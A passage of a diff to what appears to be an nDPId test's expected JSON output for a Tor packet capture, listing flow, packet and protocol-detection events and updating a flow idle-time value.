+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821668403,"flow_last_seen":1383821668403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821668403,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1383821668403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668403,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A3VAAIAGx5DAqAH8JuVGNceoAbuUs9YxAAAAAIACIADrCAAAAgQFtAEDAwgBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1383821668547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668547,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x6iEDREglLPWMoASOQg8wAAAAgQFtAEBBAIBAwMK"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1383821668548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821668548,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA3ZAAIAGx5vAqAH8JuVGNceoAbuUs9YyhA0RIVAQAQC1nQAAAAAAAAAA"} 
+01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821668403,"flow_last_seen":1383821668548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1383821668548,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821668403,"flow_last_seen":1383821668700,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1383821668700,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": 
{"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":80,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821670213} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":80,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821669834,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00178{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":83,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821672213} 
@@ -102,8 +102,8 @@ 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1383821733324,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1383821733324,"pkt":"\/\/\/\/\/\/\/\/UlQAwqwfCABFAACsAABAAEARtfDAqAEBwKgB\/0RcRFwAmDDeeyJob3N0X2ludCI6IDY3Njg3OTk3NiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICI2NzY4Nzk5NzYiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsxNjc4NDEyMTYsIDE4MTA4Mzk2OCwgMTgxMDgwMzI0LCAyOTU0NDE3M119"} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":671,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821734213} 00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":671,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821734087,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383821734359,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1383821734359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821734359,"pkt":"UlQA2EYhUlQAWul3CABFAAAoBE1AAIAGeHjAqAH8nTgeLsegAbuzcgvfGiCX\/lAUAAD2+QAAAAAAAAAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383821734359,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1383821734359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821734359,"pkt":"UlQA2EYhUlQAWul3CABFAAAoBE1AAIAGeHjAqAH8nTgeLsegAbuzcgvfGiCX\/lAUAAD2+QAAAAAAAAAA"} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":690,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821736213} 
00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":690,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821736176,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":755,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821738213} 
@@ -162,34 +162,34 @@ 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1836,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822123915,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1837,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822128212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1837,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822123915,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1840,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822129889,"flow_last_seen":1383822129889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822129889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1840,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1383822129889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CJdAAIAGvzrAqAH81FOb+sfmAbsbVwNmAAAAAIACIAAzvwAAAgQFtAEDAwgBAQQC"} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1841,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822129897,"flow_last_seen":1383822129897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822129897,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1383822129897,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129897,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CJhAAIAGdgbAqAH8W49d8sfnAbtnuw7MAAAAAIACIACSwAAAAgQFtAEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1383822129949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129949,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADEGFtLUU5v6wKgB\/AG7x+atYj18G1cDZ4ASOQgvyAAAAgQFtAEBBAIBAwMH"} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1383822129951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822129951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJlAAIAGv0TAqAH81FOb+sfmAbsbVwNnrWI9fVAQAQCoogAAAAAAAAAA"} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1383822129961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129961,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x+fD3pw1Z7sOzYASOQgZlAAAAgQFtAEBBAIBAwMH"} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1383822129962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822129962,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJpAAIAGdhDAqAH8W49d8sfnAbtnuw7Nw96cNlAQAQCSbgAAAAAAAAAA"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1846,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129889,"flow_last_seen":1383822129965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822129965,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1847,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129897,"flow_last_seen":1383822129972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383822129972,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01153{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1849,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129889,"flow_last_seen":1383822130023,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":743,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1383822130023,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.wohgpas45j6ucw.com","subjectDN":"CN=www.7d43ah2kikrabj.net","fingerprint":"F9:1D:5F:89:8F:D8:58:1E:45:E7:9B:A6:FD:90:95:77:FF:DD:E8:1B"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1852,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129897,"flow_last_seen":1383822130047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":961,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383822130047,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1840,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822129889,"flow_last_seen":1383822129889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822129889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1840,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1383822129889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CJdAAIAGvzrAqAH81FOb+sfmAbsbVwNmAAAAAIACIAAzvwAAAgQFtAEDAwgBAQQC"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1841,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822129897,"flow_last_seen":1383822129897,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822129897,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1383822129897,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129897,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CJhAAIAGdgbAqAH8W49d8sfnAbtnuw7MAAAAAIACIACSwAAAAgQFtAEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1383822129949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129949,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADEGFtLUU5v6wKgB\/AG7x+atYj18G1cDZ4ASOQgvyAAAAgQFtAEBBAIBAwMH"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1383822129951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822129951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJlAAIAGv0TAqAH81FOb+sfmAbsbVwNnrWI9fVAQAQCoogAAAAAAAAAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1383822129961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129961,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x+fD3pw1Z7sOzYASOQgZlAAAAgQFtAEBBAIBAwMH"} 
+00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1383822129962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822129962,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJpAAIAGdhDAqAH8W49d8sfnAbtnuw7Nw96cNlAQAQCSbgAAAAAAAAAA"} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1846,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129889,"flow_last_seen":1383822129965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822129965,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1847,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129897,"flow_last_seen":1383822129972,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383822129972,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01153{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1849,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129889,"flow_last_seen":1383822130023,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":743,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1383822130023,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 